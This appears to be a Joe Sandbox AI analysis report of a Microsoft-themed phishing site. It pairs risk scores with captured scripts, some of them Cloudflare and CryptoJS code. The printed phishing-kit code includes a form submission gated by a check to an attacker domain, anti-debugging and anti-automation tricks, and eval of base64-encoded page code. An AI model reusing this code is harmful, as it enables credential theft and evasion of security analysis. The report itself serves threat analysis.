| URL: email Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": [
"No headers provided to analyze",
"Cannot make security assessment without header information",
"Default to low risk score due to lack of evidence"
]
} |
Date: unknown
|
| URL: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicates a high risk of malicious intent."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA4pnGQDZ108QgTx',
'error-callback': wJcCnYfLcJ,
callback: lVNcMMTatE,
});
function wJcCnYfLcJ() {
turnstile.reset();
}
function lVNcMMTatE() {
var yzmVFIYgAw = document.getElementById("cWqfWOSxBr");
yzmVFIYgAw.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = '8Tru';
var pEgOQmOjqp = "../hwryfkp5cw21xf5mxbwoUuhYRuaxq7rqo";
fetch('https://sd6vh7mfnilNDnCuh6xTXkmNhwmzi5tpdbaAkfM83UQfkrnVTkGSE2Ld4.mentespic.ru/48034479854053570956jAPmJUKVOKBJTVNSKCVTTALBEFFQYLWZBPRKFWZXSWDQOG', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(pEgOQmOjqp, {
method: "POST",
body: new FormData(yzmVFIYgAw)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(yZvuoDGHAM == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (login.microsoftonline.com). The script also uses a setInterval loop to repeatedly trigger a debugger statement, which could be an attempt to detect and evade analysis. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security risk."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
yZvuoDGHAM = false;
(function zaUwOTlEZs() {
let NtpBtXhSva = false;
const OrdaIBvuwM = 100;
setInterval(function() {
const pDJLnbhIZS = performance.now();
debugger;
const MPHfnypYCY = performance.now();
if (MPHfnypYCY - pDJLnbhIZS > OrdaIBvuwM && !NtpBtXhSva) {
yZvuoDGHAM = true;
NtpBtXhSva = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This script appears to be part of a Cloudflare challenge system, which is a legitimate use case. However, it contains several behaviors that raise moderate concerns, such as sending data to external domains, using obfuscated code, and performing aggressive DOM manipulation. While the intent seems to be related to a security challenge, the implementation could potentially be improved to reduce the risk profile."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'xanv7',
chlApiSitekey: '0x4AAAAAAA4pnGQDZ108QgTx',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'xuShyzJK5Wr28Qbx2mMjEaNghFaE65MbdLxiRutg9Dg-1736876457-1.3.1.1-rbgxGBgS3J9bsasz3ltrKaJm3ZTyot5O.kCCXhS0G4U',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '901f6a04794f4313',
cH: '7mj93atMyblfS0PxSutmR1.jhZ9HJJhlI.j6f69YuQ8-1736876457-1.1.1.1-9AFWrYYgbKxWYqBfzkgK8H3AegMSmL4WE4J__jFGXvL8kv8DPeh90bCKctdvYlGT',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'BYyolmDur5n2TD9r2QeHSiM0LfGXC0yCu8rstjD8bAo-1736876457-1.1.1.1-k1bjwb7P9POBiL37juxULWK4YdkSPoj_L3_hQqICXRNHfqhWlTHpsSKbGH7FReQXtvtZT40e.f3ucqvanKm1P50K41t0GQJGYY9kPqAVJvCyBb01yKxvAejKaLP5_8MVaXQPxvQBhxkhdaWg2kSSC1rKcf3LLW2TNZMfc8Gswk0OPdxLP_m3f2X53cDIE7EvSHy6mwwffqB12U2fXqslQB6BkmzgEA4COkf9eqeiUe3jQiKqbvrNe_L0Yn3shSnhcKI0V8xNu9VyjINpIUF2n_z0jOwnLQrktvQZFGbm0YGDzfZSelUSWXOGD9EQNzqCt9NoE8.rauaPq3kjX2Wg2DIqfsI9gOP2zyBACTnOrRmSPLbUTQX8Or48x5grF5TUYqZdYVJOdL9hRS7jRYf0ZeRp9d10AUuctv65mNCNGIA0H8VUSWQ263bKGwvypIbBgIimCrTSARfzXRFHzjTKqQWzZdFqlX23AK2Q_e1yXuIeZg3lfrtebTz1fXsJIi7lATBqKr7ulsRrZAVqAe15wzfQsGNarlq0cTnAnwqUZDow8gZhmFip_5UC_k.yd3utJEGjWgE_MSutnJ5qWVfnyEUXgCroRbpASVLQRacfCZ3_FB.3b6cdMi7gEIv5hdtLwvL9acoI0hYbQ.7dAl63UYN5PSZ.1hCHzLvQQGMm3KXur4bMHG9NjKg4HJIRnFbCvy3ifuKDn_3k8m4k7P25sXmJY69lFbhfQUhhuvj60lD0P.3I0kQqtUiK4tSiqLTTF.XtNS.6enqpUXn9BaBvZeq0DJ06xo82u3kDUsz3BEaK68T8rkCnhT05wcJ7gL2rFy.JLEq5RPxTeieYegrEaJsmcDx1MDq5f50pbdjwzA8yKUVQryMXPEeiBEeNpw54kaRAwElgbTJOy1gHt251wsRPXHuPyik8pgyxJEZ110.aCSnl8NzsZckoE1ZBI60zl2sEQAu.zxgA8nWMHbbb8LcPIebL.xuT19NtAItYzeVBnrddLEvyi.hdLM8TFfcI46UTm7iEPFHKaOmLqwyKxE0YvRCB4iaROGZfxzpAMNdMBQs70a2gjJYVzXtxphuea5_ANlWWGTmfa11_G0ZtmX1d4ngMwBnkaSvYIdB7hMwE9WWtIKXebw5r_WaYlfeUhz9VFmK73Fyw2UdcrbclQ0To5c_d2ihsbBYfY0_35tRYSWxHrt6.GsJg2hNQ1n.MlcrbVRySDKB1GZplE.q4CpBVMOq_UCmItA_wzYG.yvypxLQu0aWurfBjtIzvANthy5sG3LNdefTOY8LiYWmR1DDAoP0ZPXE53f2PNRO0O0y7_rkjpBEca2cnqjXs0O6Fj.nDAeF.zQ0NC5BPqCI4IqDcepPf6tj8_tNnofqO19c',
cITimeS: '1736876457',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'xanv7',
nextRcV: 'xuShyzJK5Wr28Qbx2mMjEaNghFaE65MbdLxiRutg9Dg-1736876457-1.3.1.1-rbgxGBgS3J9bsasz3ltrKaJm3ZTyot5O.kCCXhS0G4U',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.
|
| URL: file:///C:/Users/user/Desktop/EFT_Payment_Notifica... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses `eval` to execute a base64-encoded string, which could potentially execute remote or malicious code. It also appears to be collecting and sending user data to an unknown domain, which poses a risk of data exfiltration. Additionally, the script uses heavily obfuscated code, making it difficult to analyze and understand its true purpose. While the script may have a legitimate purpose, the combination of these high-risk indicators suggests a high likelihood of malicious intent."
} |
var _0x11dd = null;
if(location.hash == ""){
location.hash = `#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t`;
_0x11dd = `#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t`;
}
if(location.hash !== ""){
_0x11dd = location.hash;
}
if (location.hash.includes('?')) {
_0x11dd = location.hash.replace('#', '');
}
(() => {
_0x39ad=["dmFy","IGth","a2Fw","byA9","IGRv","Y3Vt","ZW50","LmNy","ZWF0","ZUVs","ZW1l","bnQo","J2lm","cmFt","ZScp","Owog","ICAg","a2Fr","YXBv","LnNh","bmRi","b3gu","YWRk","KCdh","bGxv","dy1z","YW1l","LW9y","aWdp","bicp","Owog","ICAg","a2Fr","YXBv","LnNh","bmRi","b3gu","YWRk","KCdh","bGxv","dy10","b3At","bmF2","aWdh","dGlv","bicp","Owog","ICAg","a2Fr","YXBv","LnNh","bmRi","b3gu","YWRk","KCdh","bGxv","dy1t","b2Rh","bHMn","KTsK","ICAg","IGth","a2Fw","by5z","YW5k","Ym94","LmFk","ZCgn","YWxs","b3ct","c2Ny","aXB0","cycp","Owog","ICAg"],_0xcf84=["a2Fr","YXBv","LnNh","bmRi","b3gu","YWRk","KCdh","bGxv","dy1w","b3B1","cHMt","dG8t","ZXNj","YXBl","LXNh","bmRi","b3gn","KTsK","ICAg","IGth","a2Fw","by5z","YW5k","Ym94","LmFk","ZCgn","YWxs","b3ct","Zm9y","bXMn","KTsK","ICAg","IGth","a2Fw","by5z","cmMg","PSBh","dG9i","KGBh","SFIw","Y0hN","Nkxg","K2B5","OXNP","Vmt4","YCsn","TG5s","dmMn","K2Bt","UnBZ","MnRg","KyI1","Wld3","dWMi","K2Bu","VXZN","VGAr","IlpG","THc9","PSIp","K18w","eDEx","ZGQ7","CiAg","ICBr","YWth","cG8u","c3R5","bGUu","Y3Nz","VGV4","dCA9","ICdw","b3Np","dGlv"],_0x6ee0=["bjog","Zml4","ZWQ7","IGlu","c2V0","OiAw","cHg7","IHdp","ZHRo","OiAx","MDAl","OyBo","ZWln","aHQ6","IDEw","MCU7","IGJv","cmRl","cjog","MHB4","OyBt","YXJn","aW46","IDBw","eDtw","YWRk","aW5n","OiAw","cHg7","IG92","ZXJm","bG93","OiBo","aWRk","ZW47","IHot","aW5k","ZXg6","IDk5","OTk5","OTsn","Owog","ICAg","ZG9j","dW1l","bnQu","d3Jp","dGUo","a2Fr","YXBv","KTsK","ICAg","IGRv","Y3Vt","ZW50","LmJv","ZHku","aW5u","ZXJI","VE1M","ID0g","IiI7","CiAg","ICBk","b2N1","bWVu","dC5i","b2R5","LmFw","cGVu","ZENo","aWxk","KGth","a2Fw","byk7"];
eval(atob(_0x39ad.join('')+_0xcf84.join('')+_0x6ee0.join('')));
})();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the Cloudflare challenge and providing translations for the challenge UI. This is a legitimate use case, and the script does not exhibit any suspicious or malicious behavior."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_expired":"Expired","turnstile_overrun_description":"Stuck%20here%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_failure":"Error","turnstile_feedback_report":"Having%20trouble%3F","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_description":"Send%20Feedback","turnstile_success":"Success%21","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","human_button_text":"Verify%20you%20are%20human","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_terms":"Terms","turnstile_refresh":"Refresh","turnstile_timeout":"Timed%20out","turnstile_verifying":"Verifying...","turnstile_footer_privacy":"Privacy","testing_only":"Testing%20only.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eR,eS,fk,fn,fp,fq,fr,fD,fP,fV,fW,fX,g7,gi,gm,gn,go,gp,gt,gu,gE,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(809))/1+-parseInt(gI(1089))/2+-parseInt(gI(271))/3*(parseInt(gI(1448))/4)+-parseInt(gI(363))/5+-parseInt(gI(1067))/6+-parseInt(gI(716))/7*(parseInt(gI(973))/8)+parseInt(gI(1453))/9*(parseInt(gI(1177))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,886779),eM=this||self,eN=eM[gJ(803)],eO=function(f,gK,g,h,i,j,k,l,m){for(gK=gJ,g={},g[gK(899)]=function(n,s){return n+s},g[gK(909)]=function(n,s){return n-s},h=g,m,j=32,l=h[gK(899)](eM[gK(1098)][gK(734)],'_')+0,l=l[gK(1077)](/./g,function(n,s,gL){gL=gK,j^=l[gL(996)](s)}),f=eM[gK(359)](f),k=[],i=-1;!isNaN(m=f[gK(996)](++i));k[gK(575)](String[gK(320)]((h[gK(909)](255.17&m,j)-i%65535+65535)%255)));return k[gK(685)]('')},eP=[],eQ=0;256>eQ;eP[eQ]=String[gJ(320)](eQ),eQ++);eR=(0,eval)(gJ(1398)),eS=atob(gJ(358)),eM[gJ(774)]=function(hh,d,e,f,g){hh=gJ,d={},d[hh(855)]=function(h,i){return i!==h},d[hh(1081)]=hh(529),d[hh(908)]=hh(556),e=d,f=1,g=1e3*eM[hh(842)][hh(1207)](2.28<<f,32),eM[hh(236)](function(hi,i){(hi=hh,eM[hi(438)])&&(e[hi(855)](hi(1269),e[hi(1081)])?(eM[hi(1018)][hi(459)](),eM[hi(1018)][hi(232)](),eM[hi(935)]=!![],eM[hi(438)][hi(1219)]({'source':e[hi(908)],'widgetId':eM[hi(1098)][hi(603)],'event':hi(1551),'cfChlOut':eM[hi(1098)][hi(1050)],'cfChlOutS':eM[hi(1098)][hi(832)],'code':hi(1189),'rcV':eM[hi(1098)][hi(616)]},'*')):(i={},i[hi(1583)]=hi(556),i[hi(274)]=f[hi(1098)][hi(603)],i[hi(1016)]=hi(1501),e[hi(438)][hi(1219)](i,'*')))},g)},eM[gJ(208)]=function(f,g,h,hj,i,j,k,l,m,n,o,s,x,B,C,D){i=(hj=gJ,{'T |
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent."
} |
/* Do not be embarrassed by your failures, learn from them and start again. */
if(atob("aHR0cHM6Ly9sOVkxLnlvcmRpY2t5ZWwucnUvMTZFLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNhU3RtWFZaeFhDIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2FTdG1YVlp4WEMgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2FTdG1YVlp4WEMgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojYVN0bVhWWnhYQyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2FTdG1YVlp4WEMuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTM3cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNhU3RtWFZaeFhDIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQojYVN0bVhWWnhYQyAuY29sLWxnLTR7ZmxleDowIDAgYXV0bzt3aWR0aDozMy4zMzMzMzMzMyU7fQ0KfQ0KI2FTdG1YVlp4WEMgLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQojYVN0bVhWWnhYQyAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQojYVN0bVhWWnhYQyAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI2FTdG1YVlp4WEMgLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI2FTdG1YVlp4WEMubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNhU3RtWFZaeFhDIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojYVN0bVhWWnhYQyAjRHNWWkdxTHhlViB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NCkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDcyKSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIHJldHVybiBmYWxzZTsNCn0pOw0KeVp2dW9ER0hBTSA9IGZhbHNlOw0KKGZ1bmN0aW9uIHphVXdPVGxFWnMoKSB7DQogICAgbGV0IE50cEJ0WGhTdmEgPSBmYWxzZTsNCiAgICBjb25zdCBPcmRhSUJ2dXdNID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKC |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the challenge and the parent window. While the script uses some dynamic code execution techniques, such as `postMessage()`, these are likely part of the legitimate functionality of the Cloudflare challenge and do not appear to be malicious. The script does not exhibit any clear indicators of high-risk behavior, such as data exfiltration or redirects to suspicious domains. Overall, the script seems to be a benign implementation of a Cloudflare challenge, with some outdated practices but no clear malicious intent."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'xanv7',
